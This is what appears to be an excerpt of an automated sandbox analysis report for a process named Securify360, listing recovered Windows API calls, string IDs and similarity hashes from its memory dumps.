                                                                                              • CloseHandle.KERNEL32(?), ref: 00FE9572
                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00FE957B
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00FE9582
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                              • String ID:
                                                                                              • API String ID: 146765662-0
                                                                                              • Opcode ID: 2fe9a219bdf6bd4a358495a179859f0ebaf5df5a1b0a73e54a4eb0426bbdaacb
                                                                                              • Instruction ID: aad0946d50746885308663ad21d1439b64125b310ff3e6fd2d53a42fd1e496a0
                                                                                              • Opcode Fuzzy Hash: 2fe9a219bdf6bd4a358495a179859f0ebaf5df5a1b0a73e54a4eb0426bbdaacb
                                                                                              • Instruction Fuzzy Hash: DBE0C236004201BBDA211FE1EC0C95ABF29FB49722B608220F2559147CCB3B9460DB50
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 01008CFD
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 01008E0C
                                                                                              • VariantClear.OLEAUT32(?), ref: 01008F84
                                                                                                • Part of subcall function 00FF7B1D: VariantInit.OLEAUT32(00000000), ref: 00FF7B5D
                                                                                                • Part of subcall function 00FF7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00FF7B66
                                                                                                • Part of subcall function 00FF7B1D: VariantClear.OLEAUT32(00000000), ref: 00FF7B72
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                              • API String ID: 4237274167-1221869570
                                                                                              • Opcode ID: 8a9dd9b75e5b0585efc26b3464d75374eea35e8363bcbebdc3fecbab15c19e8d
                                                                                              • Instruction ID: 9c7047554abcb5fbc26514e2d4e47b26dc173e983300132bdf59f1668969afa0
                                                                                              • Opcode Fuzzy Hash: 8a9dd9b75e5b0585efc26b3464d75374eea35e8363bcbebdc3fecbab15c19e8d
                                                                                              • Instruction Fuzzy Hash: 52919170A083019FD711DF24C88095ABBF5FF99354F04896EF9858B3A1DB34E905CB52
                                                                                              APIs
                                                                                                • Part of subcall function 00FA436A: _wcscpy.LIBCMT ref: 00FA438D
                                                                                              • _memset.LIBCMT ref: 00FF332E
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FF335D
                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FF3410
                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00FF343E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                              • String ID: 0
                                                                                              • API String ID: 4152858687-4108050209
                                                                                              • Opcode ID: d3975707bad7dde01f5fbaf96b48ee2048136102630675f4c235d48404a3ec05
                                                                                              • Instruction ID: 9c71731195dfc0cb1da99d7a2e3662666852e38ac456dd90465a02ad91c20267
                                                                                              • Opcode Fuzzy Hash: d3975707bad7dde01f5fbaf96b48ee2048136102630675f4c235d48404a3ec05
                                                                                              • Instruction Fuzzy Hash: F851F131A083089BD725EE28C84567BB7E8AF45760F04062DFA95D31E1DB74DE44EB52
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,01008A0E,?,00000000), ref: 0101DF71
                                                                                              • SetErrorMode.KERNEL32(00000001,?,00000000,00000000,00000000,?,01008A0E,?,00000000,00000000), ref: 0101DFA7
                                                                                              • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 0101DFB8
                                                                                              • SetErrorMode.KERNEL32(00000000,?,00000000,00000000,00000000,?,01008A0E,?,00000000,00000000), ref: 0101E03A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                              • String ID: DllGetClassObject
                                                                                              • API String ID: 753597075-1075368562
                                                                                              • Opcode ID: d4c80207dd0504f7ae407dfec221a692cebcf1ed9311249d8563aac55d25f18b
                                                                                              • Instruction ID: 284030088f96b326649b793a29c1d4a208f545380d53e41992d418d6f0e2d837
                                                                                              • Opcode Fuzzy Hash: d4c80207dd0504f7ae407dfec221a692cebcf1ed9311249d8563aac55d25f18b
                                                                                              • Instruction Fuzzy Hash: 43417F71600205DFDB16CF55C884AAE7BA9EF44310B5480AEFE459F209D7BADD84CBA0
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00FF2F67
                                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00FF2F83
                                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00FF2FC9
                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01057890,00000000), ref: 00FF3012
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 1173514356-4108050209
                                                                                              • Opcode ID: 5cc8d1360a372abb3b2f0fcea6d2a53122131d049f9e41b2a9bb9eb6395bd3f9
                                                                                              • Instruction ID: a97dfadae23482e39f6fa6ea50de9a4be3c7a32e1b234173f23496280f86383e
                                                                                              • Opcode Fuzzy Hash: 5cc8d1360a372abb3b2f0fcea6d2a53122131d049f9e41b2a9bb9eb6395bd3f9
                                                                                              • Instruction Fuzzy Hash: 7F4115716043459FD720DF24CC84B2ABBE4AF84324F10461EFAA5973E1DB74EA04DB52
                                                                                              APIs
                                                                                                • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                                                                • Part of subcall function 00FEB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00FEB7BD
                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FE9ACC
                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FE9ADF
                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00FE9B0F
                                                                                                • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_memmove$ClassName
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 365058703-1403004172
                                                                                              • Opcode ID: 4c0e2798b953ef6255a6e6073e6779f97f47f3cc8d62f6e186829e5d3e908bcf
                                                                                              • Instruction ID: 6e6bbbac5e1e1c5bfa1b7e50ed75bd03fc208f6c970742fc2039c31176f00dcb
                                                                                              • Opcode Fuzzy Hash: 4c0e2798b953ef6255a6e6073e6779f97f47f3cc8d62f6e186829e5d3e908bcf
                                                                                              • Instruction Fuzzy Hash: 6D2104B1A04104BEDB24EBA1DC85DFFB768EF86360F204129F865972D4DB7C0909A660
                                                                                              APIs
                                                                                                • Part of subcall function 00F92111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F9214F
                                                                                                • Part of subcall function 00F92111: GetStockObject.GDI32(00000011), ref: 00F92163
                                                                                                • Part of subcall function 00F92111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F9216D
                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01016A86
                                                                                              • LoadLibraryW.KERNEL32(?), ref: 01016A8D
                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 01016AA2
                                                                                              • DestroyWindow.USER32(?), ref: 01016AAA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                              • String ID: SysAnimate32
                                                                                              • API String ID: 4146253029-1011021900
                                                                                              • Opcode ID: 1088bcd8297a5ed23a085272ae28f5ba9c6c93ead8a9e2c82676a92fb89f7616
                                                                                              • Instruction ID: e4431474729cd91868df0bea4e4b60d2af7efd2bb323d68ee496697876798335
                                                                                              • Opcode Fuzzy Hash: 1088bcd8297a5ed23a085272ae28f5ba9c6c93ead8a9e2c82676a92fb89f7616
                                                                                              • Instruction Fuzzy Hash: D721C972100205AFEF618E69DC40EBB77EDFF45324F908518FA9192189D3BBDC519B60
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00FF7377
                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FF73AA
                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00FF73BC
                                                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00FF73F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHandle$FilePipe
                                                                                              • String ID: nul
                                                                                              • API String ID: 4209266947-2873401336
                                                                                              • Opcode ID: db4c2442a513fb840fd07549f8c86c98fd67d1bd9d77b616e363b40a4614cc50
                                                                                              • Instruction ID: 70cda382fbe0d5827be7a1b0ffaf98b245c0848216f6d31fd165f8a9a84414b8
                                                                                              • Opcode Fuzzy Hash: db4c2442a513fb840fd07549f8c86c98fd67d1bd9d77b616e363b40a4614cc50
                                                                                              • Instruction Fuzzy Hash: 0F21A97190830EABDB20AF65DC45AA9F7E4AF45730F204A19FEA0D72E4D771D850EB50
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00FF7444
                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FF7476
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00FF7487
                                                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00FF74C1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHandle$FilePipe
                                                                                              • String ID: nul
                                                                                              • API String ID: 4209266947-2873401336
                                                                                              • Opcode ID: 40e4d75e05b00691ec7b2571c2d2902cac79ad2370b25e2395699a47e67f4927
                                                                                              • Instruction ID: 6c355b664ecdcc9e9a6847361aca0ae2b41c5a05576d3ea70d1922da324a215d
                                                                                              • Opcode Fuzzy Hash: 40e4d75e05b00691ec7b2571c2d2902cac79ad2370b25e2395699a47e67f4927
                                                                                              • Instruction Fuzzy Hash: 0321A771908309DBDB20EF689C44AA9FBA8AF55730F200B19FAA0D72E0D7719854DB51
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00FFB297
                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00FFB2EB
                                                                                              • __swprintf.LIBCMT ref: 00FFB304
                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,01020980), ref: 00FFB342
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                                              • String ID: %lu
                                                                                              • API String ID: 3164766367-685833217
                                                                                              • Opcode ID: 47801f05149e2e23f8a9e34b7f2f08a556453bf48d95901215718866c8f76c5a
                                                                                              • Instruction ID: a0a1269480012a04487e6c3ea37a81131f2ed174dcdc80d94b2625072b523488
                                                                                              • Opcode Fuzzy Hash: 47801f05149e2e23f8a9e34b7f2f08a556453bf48d95901215718866c8f76c5a
                                                                                              • Instruction Fuzzy Hash: BA218635A0020DAFCB20DF65CC45DAEB7B8EF89714B104069F905E7251DB35EE45DB61
                                                                                              APIs
                                                                                                • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                                                                • Part of subcall function 00FEAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FEAA6F
                                                                                                • Part of subcall function 00FEAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FEAA82
                                                                                                • Part of subcall function 00FEAA52: GetCurrentThreadId.KERNEL32 ref: 00FEAA89
                                                                                                • Part of subcall function 00FEAA52: AttachThreadInput.USER32(00000000), ref: 00FEAA90
                                                                                              • GetFocus.USER32 ref: 00FEAC2A
                                                                                                • Part of subcall function 00FEAA9B: GetParent.USER32(?), ref: 00FEAAA9
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00FEAC73
                                                                                              • EnumChildWindows.USER32(?,00FEACEB), ref: 00FEAC9B
                                                                                              • __swprintf.LIBCMT ref: 00FEACB5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                              • String ID: %s%d
                                                                                              • API String ID: 1941087503-1110647743
                                                                                              • Opcode ID: 6e2be4592f9d07b2a2cd36ecc0cbba590a19cc0f9896b67c58c57aac74b20288
                                                                                              • Instruction ID: 99e8f7227430530a9857db15b53ffa7c05701f9764b811e1684bc5f6ee19f61a
                                                                                              • Opcode Fuzzy Hash: 6e2be4592f9d07b2a2cd36ecc0cbba590a19cc0f9896b67c58c57aac74b20288
                                                                                              • Instruction Fuzzy Hash: 3511E475600304ABCF21BFA1DD85FEA376CAB49710F104079FE18AA142CA79A945EB72
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00FF2318
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpper
                                                                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                              • API String ID: 3964851224-769500911
                                                                                              • Opcode ID: 1d7ead0317c1ea84dc5501d0074cda1c35a5f8f8c4557274934739085b382e5d
                                                                                              • Instruction ID: 33e9e1e4734062dee5cea44e7d1142cdb87125158650821de70a5801f031ae91
                                                                                              • Opcode Fuzzy Hash: 1d7ead0317c1ea84dc5501d0074cda1c35a5f8f8c4557274934739085b382e5d
                                                                                              • Instruction Fuzzy Hash: AE1170B090012D9BCF00EFA4C8408FEB7B4FF1A304B508054D950572A1DF3A5D06DF50
                                                                                              APIs
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0100F2F0
                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0100F320
                                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0100F453
                                                                                              • CloseHandle.KERNEL32(?), ref: 0100F4D4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                              • String ID:
                                                                                              • API String ID: 2364364464-0
                                                                                              • Opcode ID: 26776109e58384df6053a677a56c21c1468a64fca9b88d9ef4d8a44a2fa84423
                                                                                              • Instruction ID: ecd27cf4dbe8c29b8d29c22229ceb41e09e11b101fc8a60d059b0278c4ed7123
                                                                                              • Opcode Fuzzy Hash: 26776109e58384df6053a677a56c21c1468a64fca9b88d9ef4d8a44a2fa84423
                                                                                              • Instruction Fuzzy Hash: 8E81B2716003019FEB21EF28DC82F2EB7E5AF54B14F14885DF999DB2D2DB74A8019B91
                                                                                              APIs
                                                                                                • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                                                                • Part of subcall function 0101147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101040D,?,?), ref: 01011491
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0101075D
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0101079C
                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 010107E3
                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 0101080F
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0101081C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 3440857362-0
                                                                                              • Opcode ID: 3801ed46e7d01ac94af0568e1a45a482c1da6ca9865be81d4f6fe826b3ff8da9
                                                                                              • Instruction ID: a6c7a7a39490d976b79001cd6157020147bb6f1b18f72348de9b7b6cf276ed92
                                                                                              • Opcode Fuzzy Hash: 3801ed46e7d01ac94af0568e1a45a482c1da6ca9865be81d4f6fe826b3ff8da9
                                                                                              • Instruction Fuzzy Hash: 82517871208305AFD714EF68CC81E6AB7E8BF84304F00891DF9D587295DB39E945DB52
                                                                                              APIs
                                                                                                • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                                                                • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                                                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0100E010
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0100E093
                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0100E0AF
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0100E0F0
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0100E10A
                                                                                                • Part of subcall function 00FA402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FF7E51,?,?,00000000), ref: 00FA4041
                                                                                                • Part of subcall function 00FA402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FF7E51,?,?,00000000,?,?), ref: 00FA4065
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
